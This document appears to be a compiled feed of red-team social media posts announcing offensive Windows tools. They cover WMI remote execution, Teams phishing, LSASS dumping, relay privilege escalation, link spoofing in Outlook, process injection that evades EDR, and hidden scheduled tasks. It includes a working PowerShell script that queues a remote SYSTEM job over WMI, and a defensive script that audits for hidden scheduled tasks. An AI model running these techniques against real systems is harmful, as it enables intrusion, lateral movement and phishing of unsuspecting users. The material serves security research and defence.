[ kleiton0x7e, Kleiton Kurti ]
Came up with an improved version of WMIExec. By leveraging the Win32_ScheduledJob class, we can remotely create scheduled jobs. This way it's not required anymore to rely on port 139 and 445.
Github:
#CyberSecurity #redteam #infosec #infosecurity
https://github.com/WKL-Sec/wmiexec/
[ tweet ]
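The remote AT-job creation the tweet describes, as an added PowerShell example that is not the WKL-Sec wmiexec code: it reaches the target over WMI/DCOM only (TCP/135 plus one RPC dynamic port, nothing on 139/445), checks the EnableAt flag that Windows 8 / Server 2012 and later require before Win32_ScheduledJob.Create succeeds, and queues a one-shot job. The hostname, credential and command line are placeholders; the caller is assumed to be a local administrator on the target.

```powershell
# Added example (not the WKL-Sec wmiexec code): queue a one-shot AT job on a remote
# host over WMI/DCOM alone. $Target, $Cred and $Command are placeholders.
param(
    [string]$Target     = 'ws01.corp.example',   # assumed hostname
    [pscredential]$Cred = (Get-Credential),
    [string]$Command    = 'cmd.exe /c whoami /all > C:\Windows\Temp\job.out'
)

# DCOM rather than WS-Man: TCP/135 plus one RPC dynamic port, no SMB (139/445).
$opt  = New-CimSessionOption -Protocol Dcom
$sess = New-CimSession -ComputerName $Target -Credential $Cred -SessionOption $opt

# Windows 8 / Server 2012 and later fail Win32_ScheduledJob.Create (ReturnValue 8,
# "Unknown failure") unless EnableAt is 1. Read it via StdRegProv; flipping it is an
# auditable registry change a defender can watch for, so restore it afterwards.
$HKLM    = [uint32]2147483650          # HKEY_LOCAL_MACHINE for StdRegProv
$subKey  = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration'
$regArgs = @{ hDefKey = $HKLM; sSubKeyName = $subKey; sValueName = 'EnableAt' }
$at = Invoke-CimMethod -CimSession $sess -ClassName StdRegProv -MethodName GetDWORDValue -Arguments $regArgs
$restore = $false
if ($at.ReturnValue -ne 0 -or $at.uValue -ne 1) {
    Invoke-CimMethod -CimSession $sess -ClassName StdRegProv -MethodName SetDWORDValue `
        -Arguments ($regArgs + @{ uValue = [uint32]1 }) | Out-Null
    $restore = $true
}

# StartTime is DMTF with the date masked: ********HHMMSS.ffffff+OOO (offset in minutes).
# The offset is taken from this machine's clock; verify the target's zone if it differs.
$dmtf  = [System.Management.ManagementDateTimeConverter]::ToDmtfDateTime((Get-Date).AddMinutes(2))
$start = '********' + $dmtf.Substring(8)

$job = Invoke-CimMethod -CimSession $sess -ClassName Win32_ScheduledJob -MethodName Create -Arguments @{
    Command             = $Command
    StartTime           = $start
    RunRepeatedly       = $false
    InteractWithDesktop = $false
}
if ($job.ReturnValue -ne 0) { throw "Win32_ScheduledJob.Create failed, ReturnValue=$($job.ReturnValue)" }

# AT jobs run as LocalSystem and leave %SystemRoot%\Tasks\At<JobId>.job on the target.
Write-Host "Queued JobId $($job.JobId) on $Target, starts at $start as SYSTEM"
Get-CimInstance -CimSession $sess -ClassName Win32_ScheduledJob -Filter "JobId=$($job.JobId)"

# Cleanup once the job has fired, still over WMI only:
# Get-CimInstance -CimSession $sess -ClassName Win32_ScheduledJob -Filter "JobId=$($job.JobId)" |
#     ForEach-Object { Invoke-CimMethod -InputObject $_ -MethodName Delete }
# if ($restore) {
#     Invoke-CimMethod -CimSession $sess -ClassName StdRegProv -MethodName SetDWORDValue `
#         -Arguments ($regArgs + @{ uValue = [uint32]0 }) | Out-Null
# }
Remove-CimSession $sess
```

This example only queues execution: WMI has no file-read method, so getting the command's output back without SMB needs a separate channel, which the example does not provide. For the blue team the artefacts are the EnableAt change under Schedule\Configuration, new At*.job files under %SystemRoot%\Tasks, and DCOM/WMI sessions from hosts that do not normally administer the target.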
[ Octoberfest73, Octoberfest7 ]
Happy early 4th- TeamsPhisher is out now! Send messages + attachments to external Teams users for the purpose of phishing for access.
This short project was a fun departure from all of the BOF and Post-ex stuff I typically focus on.
#redteam #Malware
https://github.com/Octoberfest7/TeamsPhisher
[ tweet ]
[ SEKTOR7net, SEKTOR7 Institute ]
A guide to building your engagement infrastructure, by André Tschapeller (@hipstertrojan)
#redteam
https://www.securesystems.de/blog/building-a-red-team-infrastructure-in-2023/
[ tweet ]
[ r1cksec, r1cksec ]
New cheatsheets pushed
https://github.com/r1cksec/cheatsheets
Including:
A well-written blog post on how to read and parse LSASS memory dumps with PowerShell
#infosec #cybersecurity #pentesting #redteam #lsass #windows
https://powerseb.github.io/posts/LSASS-parsing-without-a-cat
[ tweet ]
[ fortunato lodari @flodari ]
Are you tired of failing to create DNS Entry for DavRelay?
LPE with:
ssh -R +
addcomputer.py +
Proxychains +
Proxylite +
PetitPotam +
rbcd_relay
no AV/EDR detection, only SIEM (if) checks on LDAP changes
#redteam #LPE #DAVRelay #FUD
[ tweet ]
+ demo on Cobalt Strike:
https://threadreaderapp.com/thread/1697922181684936753.html
[ Louis Dion-Marcil @ldionmarcil ]
Outlook for Windows can be tricked into displaying a fake domain, but open another one. Add a <base> tag with a fake domain + left-to-right mark (U+200E)
Links in <a> tags will show the fake domain, but open the real domain.
No need to buy .zip! :) Convincing #phishing #redteam
[ tweet ]
[ HADESS @Hadess_security ]
The Art Of Hiding In Windows: techniques used by malicious actors to obscure their activities, making detection and analysis significantly more challenging for security professionals.
Article:
https://hadess.io/the-art-of-hiding-in-windows/
EBook:
https://hadess.io/the-art-of-hiding-in-windows-ebook/
#windows #redteam
[ tweet ]
(PDF in the comments)
[ Kleiton Kurti @kleiton0x7e ]
Spent some time reversing undocumented Syscalls residing in Kernel32/Ntdll and created a PoC for proxying DLL loads. This leads to a clean call stack as the return address pointing to shellcode won't be pushed to stack.
#CyberSecurity #redteam #infosec
https://github.com/kleiton0x00/Proxy-DLL-Loads
[ tweet ]
[ Panagiotis Chartas @t3l3machus ]
For your #redteam enumeration and brute forcing needs, use babelstrike to transliterate and generate usernames from full names in various non-English languages (common issue from scraped employee data). Currently, it covers Greek, Hindi, Spanish, French, Polish, and Hungarian:
https://github.com/t3l3machus/BabelStrike
Combine it with #psudohash, a password list generator that imitates password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers (leet), using char-case variations, adding a common padding before or after the main passphrase and more:
https://github.com/t3l3machus/psudohash
[ tweet ]
[ HackerRalf @hacker_ralf ]
Everyone takes a lot from the community... it's time to give something back yourself.
Kerbeus - BOF implementation of Rubeus (not all).
https://github.com/RalfHacker/Kerbeus-BOF
P. S. PM me about all bugs
#redteam #kerberos #havoc #cobaltstrike #bof
[ tweet ]
[ WHOAMI @wh0amitz ]
To audit the security of read-only domain controllers, I created the SharpRODC project, a simple .NET tool for RODC-related misconfigurations.
https://github.com/wh0amitz/SharpRODC
#infosec #redteam #cybersecurity #pentesting
[ tweet ]
[ Matt Eidelberg @Tyl0us ]
Long overdue but SourcePoint v3.0 is out now, with a ton of new features and bug fixes. With these changes, Initial access and Post-Ex activities with CobaltStrike can fly under the radar.
Check it out!
#redteam #netsec
https://github.com/Tylous/SourcePoint/releases/tag/v3.0
[ tweet ]
Offensive Xwitter
[ SafeBreach @safebreach ] This is huge. As presented at #BlackHatEurope today, see how SafeBreach Labs researcher Alon Leviev developed a brand new set of highly flexible process injection techniques that are able to completely bypass leading EDR solutions…
[ Shashwat Shah @0xEr3bus ]
Just crafted a beacon object file for the 8th variant of the powerful process injection technique by @_0xDeku. An exciting journey into the Windows Thread Pool!
#cybersecurity #redteam #infosec #cobaltstrike
https://github.com/0xEr3bus/PoolPartyBof
[ tweet ]
[ SchrodingersAV @SchrodingersAV ]
Read about a technique involving tampering with scheduled tasks, and was inspired to build a powershell script to edit scheduled tasks via the registry keys.
Can be used in memory with powershell!
#redteam #cybersecurity #hacking
https://gist.github.com/Workingdaturah/991de2d176b4b8c8bafd29cc957e20c2
[ tweet ]
[ David @dmcxblue ]
Managed to port to C# the Invoke-GhostTask from @SchrodingersAV, added a little bit more details on what is going on.
#redteam
https://github.com/dmcxblue/SharpGhostTask
[ tweet ]
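A defender-side counterpart to the two GhostTask posts above, as an added PowerShell example that is neither Invoke-GhostTask nor SharpGhostTask: it walks the Task Scheduler registry cache those tools write to and reports the inconsistencies that registry-authored or registry-hidden tasks leave behind (a Tree entry without its SD value, a Tree entry whose task body is missing, a task body with no Tree entry, and Tree entries the scheduler API does not report). It assumes it is run elevated on the host being checked; the TaskCache keys are not readable by standard users.

```powershell
# Added defensive audit (not the Invoke-GhostTask / SharpGhostTask code). Run elevated.
function Get-TaskCacheFindings {
    $cache = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache'
    $findings   = New-Object 'System.Collections.Generic.List[object]'
    $referenced = @{}   # body GUID -> tree path, filled while walking Tree

    # Task bodies: TaskCache\Tasks\{GUID} carries Path, Actions, Triggers, Hash, ...
    $bodies = @{}
    foreach ($k in Get-ChildItem -Path "$cache\Tasks") {
        $bodies[$k.PSChildName] = Get-ItemProperty -Path $k.PSPath
    }

    # Tree: TaskCache\Tree\<folder>\...\<name> is what schtasks and Get-ScheduledTask
    # enumerate. A leaf holds Id (the body GUID) and SD (the task's security descriptor);
    # deleting SD is the classic way to hide a task from both.
    function Walk-Tree([string]$key, [string]$taskPath) {
        foreach ($child in Get-ChildItem -Path $key) {
            $p    = Get-ItemProperty -Path $child.PSPath
            $name = if ($taskPath) { "$taskPath\$($child.PSChildName)" } else { "\$($child.PSChildName)" }
            if ($null -ne $p.PSObject.Properties['Id']) {
                $referenced[$p.Id] = $name
                if ($null -eq $p.PSObject.Properties['SD']) {
                    $findings.Add([pscustomobject]@{ Task = $name; Id = $p.Id
                        Issue = 'Tree entry has no SD value (hidden from schtasks / Get-ScheduledTask)' })
                }
                if (-not $bodies.ContainsKey($p.Id)) {
                    $findings.Add([pscustomobject]@{ Task = $name; Id = $p.Id
                        Issue = 'Tree entry points at a Tasks\{GUID} body that does not exist' })
                }
            }
            Walk-Tree -key $child.PSPath -taskPath $name   # folders nest; leaves have no children
        }
    }
    Walk-Tree -key "$cache\Tree" -taskPath ''

    # Bodies nobody links to: left over from a deletion, or deliberately unlinked.
    foreach ($id in $bodies.Keys) {
        if (-not $referenced.ContainsKey($id)) {
            $findings.Add([pscustomobject]@{ Task = $bodies[$id].Path; Id = $id
                Issue = 'Tasks\{GUID} body with no Tree entry' })
        }
    }

    # Cross-check the registry view against what the scheduler API admits to.
    $api = @{}
    Get-ScheduledTask | ForEach-Object { $api["$($_.TaskPath)$($_.TaskName)"] = $true }
    foreach ($id in $referenced.Keys) {
        if (-not $api.ContainsKey($referenced[$id])) {
            $findings.Add([pscustomobject]@{ Task = $referenced[$id]; Id = $id
                Issue = 'Present in registry Tree but not returned by Get-ScheduledTask' })
        }
    }
    return $findings
}

Get-TaskCacheFindings | Sort-Object Task | Format-Table -AutoSize
```

A task that has only been written to the registry will not be picked up by the running Task Scheduler service until it reloads its cache, so a clean Get-ScheduledTask result on its own proves little; the registry walk is the check that matters. Expect a handful of false positives from in-flight task updates; rerun before acting on a finding.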
[ NCV @nickvourd ]
Proudly Announcing Windows Local Privilege Escalation Cookbook
#pentest #redteam #windows #privesc
https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook
[ tweet ]
[ NVISO @NVISOsecurity ]
We've expanded our #RedTeam arsenal with a new awesome Windows LPE BOF for #CobaltStrike and #BruteRatel thanks to the original exploit author @varwara.
Get your copy here!
https://github.com/NVISOsecurity/CVE-2024-26229-BOF
[ tweet ]
Offensive Xwitter
[ LuemmelSec @theluemmel ] New blog by @itm4n is a must-read for blue and red alike: https://itm4n.github.io/printnightmare-exploitation/ Quality stuff as always. Thanks I updated my Client-Checker to evaluate the affected reg keys so you can quickly…
[ parzel @parzel2 ]
During a #redteam at @mod0 we discovered a limited but neat bypass for #printnightmare. I talked to @itm4n about it and he had an in-depth look. Read about it here:
https://itm4n.github.io/printnightmare-not-over/
[ tweet ]
Forwarded from APT
Exploring WinRM plugins for lateral movement
In this blog, the process of leveraging WinRM plugins to perform lateral movement to other systems is explored. Additionally, the use of the CIM_LogicFile WMI class to bypass certain tricky detections by Microsoft Defender is examined. Finally, all the logic is incorporated into a Cobalt Strike BOF.
Research:
https://falconforce.nl/exploring-winrm-plugins-for-lateral-movement/
Source:
https://github.com/FalconForceTeam/bof-winrm-plugin-jump
#ad #winrm #cobaltstrike #bof #redteam
Forwarded from Ralf Hacker Channel (Ralf Hacker)
A simple implementation of ts::multirdp
https://gist.github.com/S3cur3Th1sSh1t/8294ec59d1ef38cba661697edcfacb9b
#soft #ad #pentest #redteam #dev